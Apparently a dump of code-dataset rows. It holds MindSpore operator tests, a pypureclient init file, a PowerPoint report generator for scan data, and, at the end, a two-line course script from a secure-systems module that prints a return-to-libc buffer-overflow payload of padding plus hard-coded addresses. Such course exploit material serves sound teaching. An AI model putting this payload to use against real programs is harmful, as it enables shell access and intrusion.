] | 621 | 2020-03-09T01:31:41.000Z | 2022-03-30T03:43:19.000Z | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore.common.initializer import initializer
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE)
class Assign(nn.Cell):
def __init__(self, x, y):
super(Assign, self).__init__()
self.x = Parameter(initializer(x, x.shape), name="x")
self.y = Parameter(initializer(y, y.shape), name="y")
self.assign = P.Assign()
def construct(self):
self.assign(self.y, self.x)
return self.y
def test_assign_bool():
x = Tensor(np.ones([3, 3]).astype(np.bool_))
y = Tensor(np.zeros([3, 3]).astype(np.bool_))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.bool_)
print(output)
assert np.all(output == output_expect)
def test_assign_int8():
x = Tensor(np.ones([3, 3]).astype(np.int8))
y = Tensor(np.zeros([3, 3]).astype(np.int8))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int8)
print(output)
assert np.all(output == output_expect)
def test_assign_uint8():
x = Tensor(np.ones([3, 3]).astype(np.uint8))
y = Tensor(np.zeros([3, 3]).astype(np.uint8))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint8)
print(output)
assert np.all(output == output_expect)
def test_assign_int16():
x = Tensor(np.ones([3, 3]).astype(np.int16))
y = Tensor(np.zeros([3, 3]).astype(np.int16))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int16)
print(output)
assert np.all(output == output_expect)
def test_assign_uint16():
x = Tensor(np.ones([3, 3]).astype(np.uint16))
y = Tensor(np.zeros([3, 3]).astype(np.uint16))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint16)
print(output)
assert np.all(output == output_expect)
def test_assign_int32():
x = Tensor(np.ones([3, 3]).astype(np.int32))
y = Tensor(np.zeros([3, 3]).astype(np.int32))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int32)
print(output)
assert np.all(output == output_expect)
def test_assign_uint32():
x = Tensor(np.ones([3, 3]).astype(np.uint32))
y = Tensor(np.zeros([3, 3]).astype(np.uint32))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint32)
print(output)
assert np.all(output == output_expect)
def test_assign_int64():
x = Tensor(np.ones([3, 3]).astype(np.int64))
y = Tensor(np.zeros([3, 3]).astype(np.int64))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int64)
print(output)
assert np.all(output == output_expect)
def test_assign_uint64():
x = Tensor(np.ones([3, 3]).astype(np.uint64))
y = Tensor(np.zeros([3, 3]).astype(np.uint64))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint64)
print(output)
assert np.all(output == output_expect)
def test_assign_float16():
x = Tensor(np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float16))
y = Tensor(np.array([[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8],
[0.1, 0.2, 0.3]]).astype(np.float16))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float16)
print(output)
assert np.all(output - output_expect < 1e-6)
def test_assign_float32():
x = Tensor(np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float32))
y = Tensor(np.array([[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8],
[0.1, 0.2, 0.3]]).astype(np.float32))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float32)
print(output)
assert np.all(output - output_expect < 1e-6)
def test_assign_float64():
x = Tensor(np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float64))
y = Tensor(np.array([[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8],
[0.1, 0.2, 0.3]]).astype(np.float64))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float64)
print(output)
assert np.all(output - output_expect < 1e-6)
class AssignAdd(nn.Cell):
def __init__(self, x, y):
super(AssignAdd, self).__init__()
self.x = Parameter(initializer(x, x.shape), name="x")
self.y = Parameter(initializer(y, y.shape), name="y")
self.assignadd = P.AssignAdd()
def construct(self):
self.assignadd(self.y, self.x)
return self.y
def test_number_assignadd_number():
input_x = 2
result1 = 5
result2 = 5
result1 += input_x
assignadd = AssignAdd(result2, input_x)
result2 = assignadd()
expect = 7
assert np.all(result1 == expect)
assert np.all(result2 == expect)
def test_tensor_assignadd_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result1 = Tensor(np.array([[4, -2], [2, 17]]))
result2 = Tensor(np.array([[4, -2], [2, 17]]))
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = Tensor(np.array([[6, 0], [5, 20]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_tensor_assignadd_number():
input_x = 3
result1 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result2 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = Tensor(np.array([[7, 1], [5, 20]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_number_assignadd_tensor():
result1 = 3
result2 = 3
input_x = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = Tensor(np.array([[7, 1], [5, 20]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_tuple_assignadd_tuple():
result1 = (1, 2, 3, 4)
result2 = (1, 2, 3, 4)
input_x = (2, 3, 4, 5, 6)
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = (1, 2, 3, 4, 2, 3, 4, 5, 6)
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_string_assignadd_string():
result1 = "string111"
result2 = "string111"
input_x = "string222"
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = "string111string222"
assert result1 == expect
assert result2 == expect
class AssignSub(nn.Cell):
def __init__(self, x, y):
super(AssignSub, self).__init__()
self.x = Parameter(initializer(x, x.shape), name="x")
self.y = Parameter(initializer(y, y.shape), name="y")
self.assignsub = P.AssignSub()
def construct(self):
self.assignsub(self.y, self.x)
return self.y
def test_number_assignsub_number():
input_x = 2
result1 = 5
result2 = 5
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = 3
assert np.all(result1 == expect)
assert np.all(result2 == expect)
def test_tensor_assignsub_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result1 = Tensor(np.array([[4, -2], [2, 17]]))
result2 = Tensor(np.array([[4, -2], [2, 17]]))
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = Tensor(np.array([[2, -4], [-1, 14]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_tensor_assignsub_number():
input_x = 3
result1 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result2 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = Tensor(np.array([[1, -5], [-1, 14]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_number_assignsub_tensor():
result1 = 3
result2 = 3
input_x = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = Tensor(np.array([[-1, 5], [1, -14]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_number_assignmul_number():
input_x = 2
result = 5
result *= input_x
expect = 10
assert np.all(result == expect)
def test_tensor_assignmul_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [2, 17]]))
result *= input_x
expect = Tensor(np.array([[8, -4], [6, 51]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assignmul_number():
input_x = 3
result = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result *= input_x
expect = Tensor(np.array([[12, -6], [6, 51]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmul_tensor():
result = 3
input_x = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result *= input_x
expect = Tensor(np.array([[12, -6], [6, 51]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndiv_number():
input_x = 2
result = 5
result /= input_x
expect = 2.5
assert np.all(result == expect)
def test_tensor_assigndiv_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 15]]))
result /= input_x
expect = Tensor(np.array([[2, -1], [2, 5]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assigndiv_number():
input_x = 3
result = Tensor(np.array([[9, -3], [6, 15]])).astype(np.float16)
result /= input_x
expect = Tensor(np.array([[3, -1], [2, 5]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndiv_tensor():
result = 3
input_x = Tensor(np.array([[2, -2], [2, -2]])).astype(np.float16)
result /= input_x
expect = Tensor(np.array([[1.5, -1.5], [1.5, -1.5]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmod_number():
input_x = 2
result = 5
result %= input_x
expect = 1
assert np.all(result == expect)
def test_tensor_assignmod_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 15]]))
result %= input_x
expect = Tensor(np.array([[0, 0], [0, 0]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assignmod_number():
input_x = 3
result = Tensor(np.array([[9, -3], [7, 15]])).astype(np.float16)
result %= input_x
expect = Tensor(np.array([[0, 0], [1, 0]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmod_tensor():
result = 3
input_x = Tensor(np.array([[2, -2], [2, -2]])).astype(np.float16)
result %= input_x
expect = Tensor(np.array([[1, -1], [1, -1]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmulmul_number():
input_x = 2
result = 5
result **= input_x
expect = 25
assert np.all(result == expect)
def test_tensor_assignmulmul_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 5]]))
result **= input_x
expect = Tensor(np.array([[16, 4], [216, 125]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assignmulmul_number():
input_x = 3
result = Tensor(np.array([[9, -3], [7, 5]])).astype(np.float16)
result **= input_x
expect = Tensor(np.array([[729, -27], [343, 125]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmulmul_tensor():
result = 3
input_x = Tensor(np.array([[2, 2], [2, 2]])).astype(np.float16)
result **= input_x
expect = Tensor(np.array([[9, 9], [9, 9]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndivdiv_number():
input_x = 2
result = 5
result //= input_x
expect = 2
assert np.all(result == expect)
def test_tensor_assigndivdiv_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 6]]))
result //= input_x
expect = Tensor(np.array([[2, -1], [2, 2]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assigndivdiv_number():
input_x = 3
result = Tensor(np.array([[9, -3], [15, 9]])).astype(np.float16)
result //= input_x
expect = Tensor(np.array([[3, -1], [5, 3]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndivdiv_tensor():
result = 3
input_x = Tensor(np.array([[1, 2], [2, 2]])).astype(np.float16)
result //= input_x
expect = Tensor(np.array([[3, 1], [1, 1]]))
assert np.all(result.asnumpy() == expect)
| 30.293139 | 78 | 0.589596 | 2,134 | 14,571 | 3.914714 | 0.074039 | 0.073737 | 0.091812 | 0.03232 | 0.848216 | 0.824635 | 0.821882 | 0.803328 | 0.715825 | 0.672851 | 0 | 0.0664 | 0.226889 | 14,571 | 480 | 79 | 30.35625 | 0.675189 | 0.043786 | 0 | 0.614555 | 0 | 0 | 0.003664 | 0 | 0 | 0 | 0 | 0 | 0.140162 | 1 | 0.12938 | false | 0 | 0.016173 | 0 | 0.161725 | 0.032345 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
24cca90261604a465cd68c565c39e57d7d5b47ed | 49 | py | Python | pypureclient/flasharray/__init__.py | tlewis-ps/py-pure-client | 589b2c0dc0a5e890eb74902a8056e43723400d50 | [
"BSD-2-Clause"
] | null | null | null | pypureclient/flasharray/__init__.py | tlewis-ps/py-pure-client | 589b2c0dc0a5e890eb74902a8056e43723400d50 | [
"BSD-2-Clause"
] | 1 | 2021-11-17T18:59:56.000Z | 2021-11-17T18:59:56.000Z | pypureclient/flasharray/__init__.py | tlewis-ps/py-pure-client | 589b2c0dc0a5e890eb74902a8056e43723400d50 | [
"BSD-2-Clause"
] | 1 | 2021-11-02T21:47:34.000Z | 2021-11-02T21:47:34.000Z | from .FA_2_4 import *
from .client import Client
| 16.333333 | 26 | 0.77551 | 9 | 49 | 4 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0.163265 | 49 | 2 | 27 | 24.5 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
700b58cb81b44a35238b337b16fdc6042fccf45b | 18,187 | py | Python | build/bdist.macosx-10.9-x86_64/wininst/PURELIB/data_xray/report/core.py | amplifilo/data-xray | c68c9b352efde0776189210794aeef84ae2cf6c2 | [
"Apache-2.0"
] | null | null | null | build/bdist.macosx-10.9-x86_64/wininst/PURELIB/data_xray/report/core.py | amplifilo/data-xray | c68c9b352efde0776189210794aeef84ae2cf6c2 | [
"Apache-2.0"
] | null | null | null | build/bdist.macosx-10.9-x86_64/wininst/PURELIB/data_xray/report/core.py | amplifilo/data-xray | c68c9b352efde0776189210794aeef84ae2cf6c2 | [
"Apache-2.0"
] | null | null | null | from ..scan import PlotImage
from ..grid import *
import numpy as np
from pptx import Presentation
from pptx.util import Inches
from matplotlib import pyplot as plt
import pandas as pd
#some utilies to work with powerpoint
meanstd = lambda arr: np.std(np.ravel(arr)/np.mean(np.ravel(arr)))
class SummaryPPT(object):
def __init__(self, pname="image_summary", new=False, fdict=None, maximages=50, chanselect = {'scan':'Z', 'grid':'cf'}, **kwargs):
if fdict is None:
print('please specify data to summarize')
return
else:
fdicts = [fdict[i:i + maximages] for i in range(0, len(fdict), maximages)]
self.topdir = os.path.commonpath([j.fname for j in fdict]) + '/'
self.chanselect = chanselect
for j,f in enumerate(fdicts):
self.presentation_name = pname + '_' + str(j)
self.pptx_file_name = self.topdir + self.presentation_name + '.pptx'
self.fdict = f
#self.new = new
self.init_ppt(self.presentation_name)
#self.insert_images()
self.insert_data()
#try:
self.pres.save(self.pptx_file_name)
print('batch ' + str(j) +' stored in : ' + self.pptx_file_name )
#except:
# print('something wrong with saving the presentation file ' + self.pptx_file_name)
def init_ppt(self, presentation_name):
pres = Presentation()
pres.notes_master.name = self.presentation_name
self.pres = pres
def insert_data(self):
for fj in self.fdict:
if re.findall('sxm', fj.fname):
try:
if self.chanselect == "Automatic":
# attempt to recognize good data
plotsignals = []
for c in fj.signals.keys():
sig = fj.signals[c]['forward']
sig = sig[~np.isnan(sig)]
if meanstd(sig) > 2:
plotsignals.append(c)
plotsignals.append('Z')
plotsignals = list(set(plotsignals)) # no dobule Z
else:
plotsignals = self.chanselect['scan']
nrows = 2 if len(plotsignals) > 2 else 1
ncols = int(np.ceil(len(plotsignals) / nrows))
f3, a3 = plt.subplots(nrows, ncols);
if a3 is not list:
a3 = [a3]
for c, a in zip(plotsignals, np.ravel(a3)):
PlotImage(fj, chan=c, ax=a, high_pass=None);
[a.axis('off') for a in np.ravel(a3)]
xy = ['X', 'Y']
offset = fj.header['scan_offset'] / 1e-9
xyoffsets = [xy[j] + '=' + str(np.round(offset[j], 2)) + ' nm ' for j in [0, 1]]
titleString = [fj.fname]
titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
self.fig_to_ppt([f3], leftop=[1, 2], txt=titleString)
print(os.path.basename(fj.ds.fname) + ' imported')
f3.clf(); # close figure so that it doesn't clog up in the end
except:
print(os.path.basename(fj.fname) + ' failed')
elif re.findall('3ds', fj.fname):
try:
fig, ax = plt.subplots(1, 2)
ChanHistogramDS(fj.ds, xy=['bias', self.chanselect['grid']], xymod=[lambda x: x, lambda x: x / np.mean(np.ravel(x))],
ax=ax[0], label=['bias', self.chanselect['grid'], ''])
# plop in a clustered map
km = ChanPcaKmeansDS(fj.ds, xvec='bias', chan=self.chanselect['grid'], mod=lambda x: x / np.mean(np.ravel(x)),
comps=6, nclust=4, fig=None)
ax[1].imshow(km)
#plt.colorbar()
titleString = [fj.fname]
except:
print(os.path.basename(fj.fname) + ' failed. Import skipped')
continue
# titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
# titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
# titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
# titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
try:
self.fig_to_ppt([fig], leftop=[1, 2], txt=titleString)
print(os.path.basename(fj.fname) + ' imported')
fig.clf(); # close figure so that it doesn't clog up in the end
except:
print(os.path.basename(fj.fname) + ' import into ppt failed')
def insert_maps(self, mapchan=['cf']):
#plop in a histogram of the map channel across the whole thing
for fj in self.fdict:
fig,ax=plt.subplots(2,1, figsize=(8,5))
ChanHistogramDS(fj.ds, xy=['bias',mapchan[0]], xymod=[lambda x:x,lambda x:x/np.mean(np.ravel(x))], ax=ax[0], label=['bias',mapchan[0][:-1],''])
#plop in a clustered map
km = ChanPcaKmeansDS(fj.ds, xvec='bias', chan=mapchan[0], mod = lambda x: x/np.mean(np.ravel(x)), comps=6, nclust=4, fig=None)
ax[1].imshow(km)
plt.colorbar()
#fig.savefig("pca_3d.png",bbox_inches='tight')
###need to add name attribute to grids
titleString = [fj.fname]
# titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
# titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
# titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
# titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
try:
self.fig_to_ppt([f3], leftop=[1, 2], txt=titleString)
print(os.path.basename(fj.ds.fname) + ' imported')
f3.clf(); #close figure so that it doesn't clog up in the end
except:
print(os.path.basename(fj.ds.fname) + ' failed')
#self.fig_to_ppt([f3], leftop=[1, 2], txt=titleString)
return
def insert_images(self):
"""
Dumpt a batch of images into a powerpoint
:param chanselect:
:param fdict:
:param topdir:
:return:
"""
#for folder in (self.fdict.keys()):
# self.text_to_slide(folder)
# newpres = Presentation()
# newpres.notes_master.name = 'sum1.pptx'
# newpres.save(newpres.notes_master.name)
for fj in self.fdict:
# TextToSlide(fj.fname,pres=pres)
try:
# scf = {1:(12,6), 2:(12,9), 3:(12,10)}
if self.chanselect == "Automatic":
#attempt to recognize good data
plotsignals = []
for c in fj.signals.keys():
sig = fj.signals[c]['forward']
sig = sig[~np.isnan(sig)]
if meanstd(sig) > 2:
plotsignals.append(c)
plotsignals.append('Z')
plotsignals = list(set(plotsignals)) #no dobule Z
else:
plotsignals = self.chanselect
nrows = 2 if len(plotsignals) > 2 else 1
ncols = int(np.ceil(len(plotsignals)/nrows))
f3, a3 = plt.subplots(nrows,ncols);
if a3 is not list:
a3 = [a3]
for c,a in zip(plotsignals,np.ravel(a3)):
PlotImage(fj, chan=c, ax=a, high_pass=None);
[a.axis('off') for a in np.ravel(a3)]
xy = ['X','Y']
offset = fj.header['scan_offset']/1e-9
xyoffsets = [xy[j] + '=' + str(np.round(offset[j],2)) + ' nm ' for j in [0,1]]
titleString = [fj.fname]
titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
self.fig_to_ppt([f3], leftop=[1, 2], txt=titleString)
print(os.path.basename(fj.ds.fname) + ' imported')
f3.clf(); #close figure so that it doesn't clog up in the end
except:
print(os.path.basename(fj.ds.fname) + ' failed')
def png_to_ppt(self, pngfile, ttl = []):
"""
Plop a PNG file into powerpoint slide
:param pngfile:
:param pres:
:param ttl:
:return:
"""
#blank_slide_layout = pres.slide_layouts[6]
title_slide_layout = self.pres.slide_layouts[9]
left = top = Inches(1)
slide = self.pres.slides.add_slide(title_slide_layout)
slide.shapes.add_picture(pngfile, left, top)
subtitle = slide.placeholders[1]
title = slide.shapes.title
if len(ttl):
subtitle.text = ttl
def fig_to_ppt(self, figs, leftop=[0,1.5], txt=None):
"""
Plop figures into powerpoint
:param figs:
:param pres:
:param leftop:
:param txt:
:return:
"""
#savepptx needs to be a full path. If None is provided the default presentation
#will be created with a name sum1.pptx in the current folder
from pptx.util import Inches
blank_slide_layout = self.pres.slide_layouts[5]
left = Inches(leftop[0])
top = Inches(leftop[1])
tmp_path = 't1.png'
for figp in figs:
plt.savefig(tmp_path, transparent=1, format='png', dpi=300, bbox_inches = 'tight')
slide = self.pres.slides.add_slide(blank_slide_layout)
slide.shapes.add_picture(tmp_path, left, top)
if txt is not None:
self.text_to_slide(txt, slide=slide)
def text_to_slide(self, txt, slide=None): #lets make txt a list of strings
"""
convert text to slide
:param txt: list of strings
:param pres:
:param slide:
:return:
"""
from pptx.util import Pt
#title = slide.shapes.title
#subtitle = slide.placeholders[1]
# title.text = "Hello, World!"
#subtitle.text = "python-pptx was here!"
# prs.save('test.pptx')
from pptx.util import Inches
if self.pres == None:
print('please init presentation')
else:
if slide is None:
bullet_slide_layout = self.pres.slide_layouts[5]
slide = self.pres.slides.add_slide(bullet_slide_layout)
shapes = slide.shapes
countshapes = 0
#just catch the first shape object with a frame in it
for shape in slide.shapes:
if not shape.has_text_frame:
continue
elif countshapes > 0:
tframe = shape.text_frame
tframe.clear()
#print('caught one')
else:
text_frame = shape.text_frame
text_frame.clear()
countshapes = 1
text_frame.clear()
p = text_frame.paragraphs[0]
for t in txt:
run = p.add_run()
run.text = t
font = run.font
font.name = 'Calibri'
font.size = Pt(12)
# p.text = t
p = text_frame.add_paragraph()
# class SummaryPPT2(object):
# def __init__(self, pname='summary', new=False, fdict=None, topdir=None, **kwargs):
# if fdict is None:
# print('please specify data to summarize')
# return
# else:
# self.fdict = fdict
# self.pname = pname
# self.new = new
# if topdir==None:
# topdir = os.getcwd()
# def crawl_and_save(self):
# for ind, (folder, files) in enumerate(zip(fdict.keys(), fdict.items())):
# #self.topdir = os.path.commonpath([j.ds.fname for j in fdict]) + '/'
# self.presentation_name = pname
# self.pptx_file_name = folder + self.presentation_name + '.pptx'
# self.new = new
# self.init_ppt()
# self.insert_images()
# try:
# self.pres.save(self.pptx.file_name)
# print('images stored in : ' + self.pptx_file_name )
# except:
# print('something wrong with saving the presentation file')
# def init_ppt(self):
# """
# Initialize powerpoint presentation
# :param pname:
# :param new:
# :return:
# """
# if self.presentation_name is None:
# newpres = Presentation()
# newpres.notes_master.name = 'sum1.pptx'
# newpres.save(newpres.notes_master.name)
# self.pres = newpres
# elif self.new:
# newpres = Presentation()
# newpres.notes_master.name = self.presentation_name
# newpres.save(newpres.notes_master.name)
# self.pres = newpres
# else:
# pres = Presentation(self.presentation_name)
# pres.notes_master.name = self.presentation_name
# self.pres = pres
# def insert_images(self, chanselect='Z'):
# """
# Dumpt a batch of images into a powerpoint
# :param chanselect:
# :param fdict:
# :param topdir:
# :return:
# """
# #for folder in (self.fdict.keys()):
# # self.text_to_slide(folder)
# for fj in self.fdict:
# # TextToSlide(fj.fname,pres=pres)
# try:
# f3, a3 = plt.subplots(1, 1)
# d2 = PlotImage(fj, chan=chanselect, ax=a3, high_pass=None)
# self.fig_to_ppt([f3], leftop=[3, 2], txt=fj.fname)
# print(os.path.basename(fj.ds.fname) + ' imported')
# except:
# print(os.path.basename(fj.ds.fname) + ' failed')
# def png_to_ppt(self, pngfile, ttl = []):
# """
# Plop a PNG file into powerpoint slide
# :param pngfile:
# :param pres:
# :param ttl:
# :return:
# """
# #blank_slide_layout = pres.slide_layouts[6]
# title_slide_layout = self.pres.slide_layouts[9]
# left = top = Inches(1)
# slide = self.pres.slides.add_slide(title_slide_layout)
# slide.shapes.add_picture(pngfile, left, top)
# subtitle = slide.placeholders[1]
# title = slide.shapes.title
# if len(ttl):
# subtitle.text = ttl
# def fig_to_ppt(self, figs, leftop=[0,1.5], txt=None):
# """
# Plop figures into powerpoint
# :param figs:
# :param pres:
# :param leftop:
# :param txt:
# :return:
# """
# #savepptx needs to be a full path. If None is provided the default presentation
# #will be created with a name sum1.pptx in the current folder
# from pptx.util import Inches
# blank_slide_layout = self.pres.slide_layouts[5]
# left = Inches(leftop[0])
# top = Inches(leftop[1])
# tmp_path = 't1.png'
# for figp in figs:
# plt.savefig(tmp_path, transparent=1, format='png', dpi=300, bbox_inches = 'tight')
# slide = self.pres.slides.add_slide(blank_slide_layout)
# slide.shapes.add_picture(tmp_path, left, top)
# if txt is not None:
# self.text_to_slide(txt, slide=slide)
# def text_to_slide(self, txt, slide=None):
# """
# convert text to slide
# :param txt:
# :param pres:
# :param slide:
# :return:
# """
# from pptx.util import Pt
# #title = slide.shapes.title
# #subtitle = slide.placeholders[1]
# # title.text = "Hello, World!"
# #subtitle.text = "python-pptx was here!"
# # prs.save('test.pptx')
# from pptx.util import Inches
# if self.pres == None:
# print('please init presentation')
# else:
# if slide is None:
# bullet_slide_layout = self.pres.slide_layouts[5]
# slide = self.pres.slides.add_slide(bullet_slide_layout)
# shapes = slide.shapes
# countshapes = 0
# #just catch the first shape object with a frame in it
# for shape in slide.shapes:
# if not shape.has_text_frame:
# continue
# elif countshapes > 0:
# tframe = shape.text_frame
# tframe.clear()
# #print('caught one')
# else:
# text_frame = shape.text_frame
# text_frame.clear()
# countshapes = 1
# text_frame.clear()
# p = text_frame.paragraphs[0]
# run = p.add_run()
# run.text = txt
# font = run.font
# font.name = 'Calibri'
# font.size = Pt(12)
| 36.013861 | 157 | 0.500027 | 2,044 | 18,187 | 4.364971 | 0.141389 | 0.017933 | 0.024658 | 0.023425 | 0.836023 | 0.803183 | 0.773369 | 0.767765 | 0.758798 | 0.743667 | 0 | 0.013923 | 0.379997 | 18,187 | 504 | 158 | 36.085317 | 0.777315 | 0.4214 | 0 | 0.5 | 0 | 0 | 0.048563 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.01087 | 0.086957 | 0 | 0.146739 | 0.065217 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
702edac88458909cbf9bb408ff36f4f7c52574a5 | 84 | py | Python | nptel_modules/module3/payload_generator_with_exit.py | ByteHackr/SecureSystemEngineering_IITM | 94319e9111a42ed9de837c78f14271d9cf65b5e5 | [
"MIT"
] | null | null | null | nptel_modules/module3/payload_generator_with_exit.py | ByteHackr/SecureSystemEngineering_IITM | 94319e9111a42ed9de837c78f14271d9cf65b5e5 | [
"MIT"
] | null | null | null | nptel_modules/module3/payload_generator_with_exit.py | ByteHackr/SecureSystemEngineering_IITM | 94319e9111a42ed9de837c78f14271d9cf65b5e5 | [
"MIT"
] | null | null | null | y = "A"*76 + "\x40\x29\xe4\xf7" + "\xb0\x67\xe3\xf7" + "\x2b\x10\xf6\xf7"
print y
